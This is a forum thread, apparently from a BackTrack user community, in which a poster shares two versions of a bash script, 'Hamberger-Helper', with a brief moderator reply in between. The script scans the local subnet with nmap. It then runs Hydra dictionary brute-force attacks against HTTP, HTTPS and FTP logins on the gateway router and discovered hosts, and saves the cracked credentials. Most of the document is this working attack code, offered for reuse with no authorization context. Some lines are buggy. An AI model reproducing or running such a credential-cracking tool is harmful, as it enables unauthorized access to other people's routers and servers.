Results 1 to 3 of 3

Thread: Hamberger-Helper v0.5 Automated Password Cracker

  1. #1
    Senior Member
    Join Date
    May 2010
    Posts
    198

    Default Hamberger-Helper v0.5 Automated Password Cracker

    I know there are probably 100 of these already but this was just practice. more to come.

    Instructions;
    edit password file path
    run script

    The script is only as good as the list but is only intended to find passwords from a small list.
    It currently takes 3 minutes to run the script with 10 users and 12 passwords in the list files on 3 different protocols.

    This only supports; (for now)
    HTTP
    HTTPS
    FTP
    SMB (coming soon) as soon as I figure out smbv2
    TELNET (Maybe soon)


    Code:
    #/bin/bash
                              version=0.5
                            passwords=/root/passwords.lst           #Where to store found passwords#
    #                             Wordlists
                             username=/root/Hydra/user.lst          #Change this!!!!!!
                             dictpath=/root/Hydra/pass.lst          #Change this!!!!!!
    #                           Hydra Options
                                tasks=15                            #Hydra tasks
    #                              Output
                              logfile=/tmp/hydra/logfile.lst        #will be adding to this for verbosity
    #                            Nmap Options
                          scanresults=/tmp/hydra/scanresults.lst    #Temp nmap scan output
    #                            Misc.
                                 temp=/tmp/hydra
    echo "#####################################"
    echo "   Welcome to Hamburger-Helper v$version"
    echo "    Automated password cracker"
    echo " (C)opyright 2010 - Scamentology"
    echo "#####################################"
    echo "check $passwords for results"
    echo "#####################################"
    #######################################
    # (C)opyright 2010 - Scamentology                                                              #
    #---License------------------------------------------------------------------------------------#
    #  This program is free software: you can redistribute it and/or modify it under the terms     #
    #  of the GNU General Public License as published by the Free Software Foundation, either      #
    #  version 3 of the License, or (at your option) any later version.                            #
    #                                                                                              #
    #  This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;   #
    #  without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.   #
    #  See the GNU General Public License for more details.                                        #
    #                                                                                              #
    #  You should have received a copy of the GNU General Public License along with this program.  #
    #  If not, see <http://www.gnu.org/licenses/>
    #----------------------------------------------------------------------------------------------#
    #This is my first stab at a shell script so dont be rude.
    #It was tested on the following routers
    #--Linksys WRT54G
    #--airlink-101
    #--Does not work on JAVA based routers (I gave up on that) You will just get everything as a valid pair.
    #--Filezilla works well (keep tasks below 15)
    #Instructions
    #You will need to give the path to you password list then run the script
    #---------------------------------------------------------------------------------------------------------------------#
    #Must have Nmap and Hydra installed; Tested on Backtrack 4 R1
    #The program will install it for you
    #---------------------------------------------------------------------------------------------------------------------------------#
    #
    #
    #
    #
    mkdir /tmp/hydra/ 2>/dev/null
    if [ ! -e "/usr/bin/nmap" ] ; then
       echo "Nmap is not installed."
       read -p ">> Would you like to try and install it? [Y/n]: " -n 1
       if [[ "$REPLY" =~ ^[Yy]$ ]] ; then action "Install Nmap" "apt-get -y install nmap" ; fi
       if [ ! -e "/usr/share/nmap/nmap-services" ] ; then
          echo "Failed to install Nmap"
       else
          display info "Installed: Nmap"
       fi
    fi
    if [ ! -e "/usr/bin/hydra" ] ; then
       echo "Hydra is not installed."
       read -p ">> Would you like to try and install it? [Y/n]: " -n 1
       if [[ "$REPLY" =~ ^[Yy]$ ]] ; then action "Install Hydra" "apt-get -y install hydra" ; fi
       if [ ! -e "/usr/bin/hydra" ] ; then
          echo "Failed to install Hydra"
       else
          display info "Installed: Hydra"
       fi
    fi
    echo "Nmap and Hydra are installed"
    IP=$(ip route | grep default | awk '{ print $3}')                                           #Gives us The Gateway IP address
    smb=""
    https=""
    ftp=""
    telnet=""
    echo "<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>"
    echo "Finding Alive Hosts and Scanning them"
    echo "<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>"
    nmap=$(nmap -oG $temp/scanresults.lst $IP/24)                                                       #Tells us what ports are open.
    smb=$(grep '139/open' $scanresults | awk '{ print $2}')
    if [ "$smb" == "" ]; then echo "No Open File Shares" ; fi
       if [ "$smb" != "" ]; then grep '139/open' $scanresults | awk '{ print $2}' >> $temp/smb.lst ; fi    
    http=$(grep '80/open' $scanresults | awk '{ print $2}')
    if [ "$http" == "" ]; then echo "No HTTP Servers" ; fi
       if [ "$http" != "" ]; then grep '80/open' $scanresults | awk '{ print $2}' >> $temp/http.lst ; fi
    https=$(grep '443/open' $scanresults | awk '{ print $2}')
    if [ "$https" == "" ]; then echo "No HTTPS Servers" ; fi
       if [ "$https" != "" ]; then grep '443/open' $scanresults | awk '{ print $2}' >> $temp/https.lst ; fi
    ftp=$(grep '21/open' $scanresults | awk '{ print $2}')
    if [ "$ftp" == "" ]; then echo "No FTP Servers" ; fi
       if [ "$ftp" != "" ]; then grep '21/open' $scanresults | awk '{ print $2}' >> $temp/ftp.lst ; fi
    telnet=$(grep '23/open' $scanresults | awk '{ print $2}')
    if [ "$telnet" == "" ]; then echo "No Telnet Servers" ; fi
       if [ "$telnet" != "" ]; then grep '23/open' $scanresults | awk '{ print $2}' >> $temp/telnet.lst ; fi
    #
    #
    #
    #Router Password Guesser
    ######################################
    #
    #
    #
    #-----------------------------#
    #           HTTP              #
    #-----------------------------#
    if [ -e "$temp/http.lst" ] ; then
    echo "<<<<<<<<<>>>>>>>>>>>"
    echo "Attacking on Port 80"
    echo "<<<<<<<<<>>>>>>>>>>>"
    xterm -geometry 75x15+10+215 -T "Hydra-Helper v$version - Cracking Router" -e "hydra -L $username -P $dictpath -e n -e s -t $tasks -f -w 15 -v $IP http-get / -o $temp/tmp1.lst" 
    grep 'password' $temp/tmp1.lst >> $temp/rec1.lst
       if [ -e "$temp/rec1.lst" ] ; then grep 'password' $temp/tmp1.lst >> $temp/http1.lst ; fi
       if [ ! -e "$temp/rec1.lst" ] ; then echo "HTTP Attack Failed" >> $logfile ; fi
    rm $temp/tmp1.lst 2>/dev/null
    fi
    #-----------------------------#
    #           HTTPS             #
    #-----------------------------#
    if [ -e "$temp/https.lst" ] ; then
    echo "<<<<<<<<<>>>>>>>>>>>>"
    echo "Attacking on Port 443"
    echo "<<<<<<<<<>>>>>>>>>>>>"
    xterm -geometry 75x15+10+215 -T "Hydra-Helper v$version - Cracking Router" -e "hydra -L $username -P $dictpath -S -e n -e s -t $tasks -f -w 15 -v $IP https-get / -o $temp/tmp2.lst" 
    grep 'password' $temp/tmp2.lst >> $temp/rec2.lst
       if [ -e "$temp/rec2.lst" ] ; then grep 'password' $temp/rec2.lst >> $temp/https2.lst ; fi
       if [ ! -e "$temp/rec2.lst" ] ; then echo "HTTPS Attack Failed" >> $logfile ; fi
    rm $temp/tmp2.lst 2>/dev/null
    fi
    #-----------------------------#
    #            FTP              #
    #-----------------------------#
    if [ -e "$temp/ftp.lst" ] ; then
    echo "<<<<<<<<<>>>>>>>>>>>"
    echo "Attacking on Port 21"
    echo "<<<<<<<<<>>>>>>>>>>>"
    xterm -geometry 75x15+10+215 -T "Hydra-Helper v$version - Cracking Router" -e "hydra -M $temp/ftp.lst ftp -s 21 -v -L $username -P $dictpath -e n -e s -t 15 -f -o $temp/tmp3.lst" 
    grep 'password' $temp/tmp3.lst >> $temp/rec3.lst
       if [ -e "$temp/rec3.lst" ] ; then grep 'password' $temp/tmp3.lst >> $temp/ftp3.lst ; fi
       if [ ! -e "$temp/rec3.lst" ] ; then echo "FTP Attack Failed" >> $logfile ; fi
    rm $temp/tmp3.lst $http 2>/dev/null
    fi
    #-----------------------------#
    #            SMB              #
    #-----------------------------#
    if [ -e "$temp/smb.lst" ] ; then
    echo "<<<<<<<<<<<>>>>>>>>>>>>"
    echo "SMB Support Coming Soon"
    echo "<<<<<<<<<<<>>>>>>>>>>>>"
    fi
    #-----------------------------#
    #           TELNET            #
    #-----------------------------#
    if [ -e "$temp/telnet.lst" ] ; then
    echo "<<<<<<<<<<<<<>>>>>>>>>>>>>"
    echo "Telnet Support Coming Soon"
    echo "<<<<<<<<<<<<<>>>>>>>>>>>>>"
    fi
    #
    #
    #
    sleep 5
    #
    #
    echo "Gathering Passwords"
    if [ ! -e "$temp/http1.lst" ] ; then
       echo "No HTTP passwords found" ; fi
    if [ -e "$temp/http1.lst" ] ; then
       cat $temp/http1.lst >> $passwords 2>/dev/null ; fi
    if [ ! -e "$temp/https2.lst" ] ; then
       echo "No HTTPS passwords found" ; fi
    if [ -e "$temp/https2.lst" ] ; then
       cat $temp/https2.lst >> $passwords 2>/dev/null ; fi
    if [ ! -e "$temp/ftp3.lst" ] ; then
       echo "No FTP passwords found" ; fi
    if [ -e "$temp/ftp3.lst" ] ; then
       cat $temp/ftp3.lst >> $passwords 2>/dev/null ; fi
    if [ ! -e "$temp/smb4.lst" ] ; then
       echo "No SMB passwords found" ; fi
    if [ -e "$temp/smb4.lst" ] ; then
       cat $temp/smb4.lst >> $passwords 2>/dev/null ; fi
    if [ ! -e "$temp/telnet5.lst" ] ; then
       echo "No SMB passwords found" ; fi
    if [ -e "$temp/telnet5.lst" ] ; then
       cat $temp/telnet5.lst >> $passwords 2>/dev/null ; fi
    #If no passwords - Do next
    if [ ! -e "$passwords" ] ; then 
       echo "No passwords recovered" ; fi
    cat $logfile 2>/dev/null
    cat $passwords
    #cleanup...
    killall xterm hydra 2>/dev/null
    rm $temp/* 2>/dev/null
    exit
    #
    #
    #
    #todo
    #add errors for missing stuff
    #add interupt and cleanup
    #add auto time and date to details
    #add different lists for different tasks (to speed this up a bit)
    #add scan for router discovery. (to customize attacks)
    #add option to retry different router pages
    "Never do anything against conscience -- even if the state demands it."
    -- Albert Einstein

  2. #2
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default Re: Hamberger-Helper v0.5 Automated Password Cracker

    The How-to section is for tutorials on tools found in BT.
    Moved.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  3. #3
    Senior Member
    Join Date
    May 2010
    Posts
    198

    Default Re: Hamberger-Helper v0.5 Automated Password Cracker

    Thanks, I was wondering where to put this. I'm not an expert and it wasn't quite a how to.

    Here's an update with bug fixes and some error reporting. Again this is just to practice my shell scripting. I just thought someone else might find it useful.

    Ive taken a lot without giving to this community so this is my attempt at returning the favor.

    [code]
    #/bin/bash
    version=0.6
    passwords=/root/passwords.lst #Where to store found passwords#
    # Wordlists
    username=/root/Hydr/user.lst #Change this!!!!!!
    dictpath=/root/Hydr/pass.lst #Change this!!!!!!
    # Hydra Options
    tasks=15 #Hydra tasks
    # Output
    logfile=/tmp/hydra/logfile.lst #will be adding to this for verbosity
    # Nmap Options
    scanresults=/tmp/hydra/scanresults.lst #Temp nmap scan output
    # Misc.
    temp=/tmp/hydra
    echo "#####################################"
    echo " Welcome to Hamburger-Helper v$version"
    echo " Automated password cracker"
    echo " (C)opyright 2010 - Scamentology"
    echo "#####################################"
    echo "check $passwords for results"
    echo "#####################################"
    #######################################
    # (C)opyright 2010 - Scamentology #
    #---License------------------------------------------------------------------------------------#
    # This program is free software: you can redistribute it and/or modify it under the terms #
    # of the GNU General Public License as published by the Free Software Foundation, either #
    # version 3 of the License, or (at your option) any later version. #
    # #
    # This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; #
    # without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. #
    # See the GNU General Public License for more details. #
    # #
    # You should have received a copy of the GNU General Public License along with this program. #
    # If not, see <http://www.gnu.org/licenses/>
    #----------------------------------------------------------------------------------------------#
    #This is my first stab at a shell script so dont be rude.
    #It was tested on the following routers
    #--Linksys WRT54G
    #--airlink-101
    #--Does not work on JAVA based routers (I gave up on that) You will just get everything as a valid pair.
    #--Filezilla works well (keep tasks below 15)
    #--Get too many bugs with SMB
    #Instructions
    #You will need to give the path to you password list then run the script
    #---------------------------------------------------------------------------------------------------------------------#
    #Must have Nmap and Hydra installed; Tested on Backtrack 4 R1
    #The program will install it for you
    #---------------------------------------------------------------------------------------------------------------------------------#
    #
    #
    #
    #
    mkdir $temp/ 2>/dev/null
    if [ ! -e "/usr/bin/nmap" ] ; then
    echo "Nmap is not installed."
    read -p ">> Would you like to try and install it? [Y/n]: " -n 1
    if [[ "$REPLY" =~ ^[Yy]$ ]] ; then action "Install Nmap" "apt-get -y install nmap" ; fi
    if [ ! -e "/usr/share/nmap/nmap-services" ] ; then
    echo "Failed to install Nmap"
    else
    display info "Installed: Nmap"
    fi
    fi
    if [ ! -e "/usr/bin/hydra" ] ; then
    echo "Hydra is not installed."
    read -p ">> Would you like to try and install it? [Y/n]: " -n 1
    if [[ "$REPLY" =~ ^[Yy]$ ]] ; then action "Install Hydra" "apt-get -y install hydra" ; fi
    if [ ! -e "/usr/bin/hydra" ] ; then
    echo "Failed to install Hydra"
    else
    display info "Installed: Hydra"
    fi
    fi
    echo "Nmap and Hydra are installed"
    if [ ! -e "$username" ] ; then
    echo "Username path not specified" ;
    exit 1
    fi
    if [ ! -e "$dictpath" ] ; then
    echo "Dictionary path not specified" ;
    exit 1
    fi
    IP=$(ip route | grep default | awk '{ print $3}') #Gives us The Gateway IP address
    smb=""
    https=""
    ftp=""
    telnet=""
    echo "<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>"
    echo "Finding Alive Hosts and Scanning them"
    echo "<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>"
    nmap=$(nmap -oG $scanresults $IP/24) #Tells us what ports are open.
    smb=$(grep '139/open' $scanresults | awk '{ print $2}')
    if [ "$smb" == "" ]; then echo "No Open File Shares" ; fi
    if [ "$smb" != "" ]; then grep '139/open' $scanresults | awk '{ print $2}' >> $temp/smb.lst ; fi
    http=$(grep '80/open' $scanresults | awk '{ print $2}')
    if [ "$http" == "" ]; then echo "No HTTP Servers" ; fi
    if [ "$http" != "" ]; then grep '80/open' $scanresults | awk '{ print $2}' >> $temp/http.lst ; fi
    https=$(grep '443/open' $scanresults | awk '{ print $2}')
    if [ "$https" == "" ]; then echo "No HTTPS Servers" ; fi
    if [ "$https" != "" ]; then grep '443/open' $scanresults | awk '{ print $2}' >> $temp/https.lst ; fi
    ftp=$(grep '21/open' $scanresults | awk '{ print $2}')
    if [ "$ftp" == "" ]; then echo "No FTP Servers" ; fi
    if [ "$ftp" != "" ]; then grep '21/open' $scanresults | awk '{ print $2}' >> $temp/ftp.lst ; fi
    telnet=$(grep '23/open' $scanresults | awk '{ print $2}')
    if [ "$telnet" == "" ]; then echo "No Telnet Servers" ; fi
    if [ "$telnet" != "" ]; then grep '23/open' $scanresults | awk '{ print $2}' >> $temp/telnet.lst ; fi
    #
    #
    #-----------------------------#
    # HTTP #
    #-----------------------------#
    if [ -e "$temp/http.lst" ] ; then
    echo "<<<<<<<<<>>>>>>>>>>>"
    echo "Attacking on Port 80"
    echo "<<<<<<<<<>>>>>>>>>>>"
    xterm -geometry 75x15+10+215 -T "Hydra-Helper v$version - Cracking HTTP" -e "hydra -L $username -P $dictpath -e n -e s -t $tasks -f -w 15 -v $IP http-get / -o $temp/tmp1.lst" | grep 'pair' | echo "Password found"
    grep 'password' $temp/tmp1.lst >> $temp/rec1.lst
    if [ -e "$temp/rec1.lst" ] ; then grep 'password' $temp/tmp1.lst >> $temp/http1.lst ; fi
    if [ ! -e "$temp/rec1.lst" ] ; then echo "HTTP Attack Failed" >> $logfile ; fi
    rm $temp/tmp1.lst 2>/dev/null
    fi
    #-----------------------------#
    # HTTPS #
    #-----------------------------#
    if [ -e "$temp/https.lst" ] ; then
    echo "<<<<<<<<<>>>>>>>>>>>>"
    echo "Attacking on Port 443"
    echo "<<<<<<<<<>>>>>>>>>>>>"
    xterm -geometry 75x15+10+215 -T "Hydra-Helper v$version - Cracking HTTPS" -e "hydra -L $username -P $dictpath -S -e n -e s -t $tasks -f -w 15 -v $IP https-get / -o $temp/tmp2.lst" >> | grep 'pair' | echo "Password found"
    grep 'password' $temp/tmp2.lst >> $temp/rec2.lst
    if [ -e "$temp/rec2.lst" ] ; then grep 'password' $temp/rec2.lst >> $temp/https2.lst ; fi
    if [ ! -e "$temp/rec2.lst" ] ; then echo "HTTPS Attack Failed" >> $logfile ; fi
    rm $temp/tmp2.lst 2>/dev/null
    fi
    #-----------------------------#
    # FTP #
    #-----------------------------#
    if [ -e "$temp/ftp.lst" ] ; then
    echo "<<<<<<<<<>>>>>>>>>>>"
    echo "Attacking on Port 21"
    echo "<<<<<<<<<>>>>>>>>>>>"
    xterm -geometry 75x15+10+215 -T "Hydra-Helper v$version - Cracking FTP" -e "hydra -M $temp/ftp.lst ftp -s 21 -v -L $username -P $dictpath -e n -e s -t 15 -f -o $temp/tmp3.lst" | grep 'pair' | echo "Password found"
    grep 'password' $temp/tmp3.lst >> $temp/rec3.lst
    if [ -e "$temp/rec3.lst" ] ; then grep 'password' $temp/tmp3.lst >> $temp/ftp3.lst ; fi
    if [ ! -e "$temp/rec3.lst" ] ; then echo "FTP Attack Failed" >> $logfile ; fi
    rm $temp/tmp3.lst 2>/dev/null
    fi
    #-----------------------------#
    # SMB #
    #-----------------------------#
    if [ -e "$temp/smb.lst" ] ; then
    echo "<<<<<<<<<<<>>>>>>>>>>>>"
    echo "SMB Support Coming Soon"
    echo "<<<<<<<<<<<>>>>>>>>>>>>"
    fi
    #-----------------------------#
    # TELNET #
    #-----------------------------#
    if [ -e "$temp/telnet.lst" ] ; then
    echo "<<<<<<<<<<<<<>>>>>>>>>>>>>"
    echo "Telnet Support Coming Soon"
    echo "<<<<<<<<<<<<<>>>>>>>>>>>>>"
    fi
    #
    #
    #
    sleep 5
    #
    #
    echo "Gathering Passwords"
    date >> $passwords
    if [ ! -e "$temp/http1.lst" ] ; then
    echo "No HTTP passwords found" ; fi
    if [ -e "$temp/http1.lst" ] ; then
    cat $temp/http1.lst >> $passwords 2>/dev/null ; fi
    if [ ! -e "$temp/https2.lst" ] ; then
    echo "No HTTPS passwords found" ; fi
    if [ -e "$temp/https2.lst" ] ; then
    cat $temp/https2.lst >> $passwords 2>/dev/null ; fi
    if [ ! -e "$temp/ftp3.lst" ] ; then
    echo "No FTP passwords found" ; fi
    if [ -e "$temp/ftp3.lst" ] ; then
    cat $temp/ftp3.lst >> $passwords 2>/dev/null ; fi
    if [ ! -e "$temp/smb4.lst" ] ; then
    echo "No SMB passwords found" ; fi
    if [ -e "$temp/smb4.lst" ] ; then
    cat $temp/smb4.lst >> $passwords 2>/dev/null ; fi
    if [ ! -e "$temp/telnet5.lst" ] ; then
    echo "No SMB passwords found" ; fi
    if [ -e "$temp/telnet5.lst" ] ; then
    cat $temp/telnet5.lst >> $passwords 2>/dev/null ; fi
    #If no passwords - Do next
    if [ ! -e "$passwords" ] ; then
    echo "No passwords recovered" ; fi
    cat $logfile 2>/dev/null
    cat $passwords
    #cleanup...
    killall xterm hydra 2>/dev/null
    rm $temp/* 2>/dev/null
    exit
    "Never do anything against conscience -- even if the state demands it."
    -- Albert Einstein

Similar Threads

  1. Looking for a RaR password cracker
    By turkystick in forum Beginners Forum
    Replies: 1
    Last Post: 04-23-2010, 01:44 PM
  2. Best PDF Password Cracker?
    By IAMZOMBIE in forum OLD General IT Discussion
    Replies: 12
    Last Post: 10-25-2009, 02:53 AM
  3. Faster ?! (Default) WPA Password Cracker
    By H.D.C. in forum OLD Newbie Area
    Replies: 3
    Last Post: 11-18-2008, 02:54 PM
  4. java password cracker
    By redmoonzer01 in forum OLD Newbie Area
    Replies: 8
    Last Post: 03-24-2008, 11:41 PM
  5. Website password cracker?
    By tyraeon in forum OLD Newbie Area
    Replies: 3
    Last Post: 09-24-2007, 06:03 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •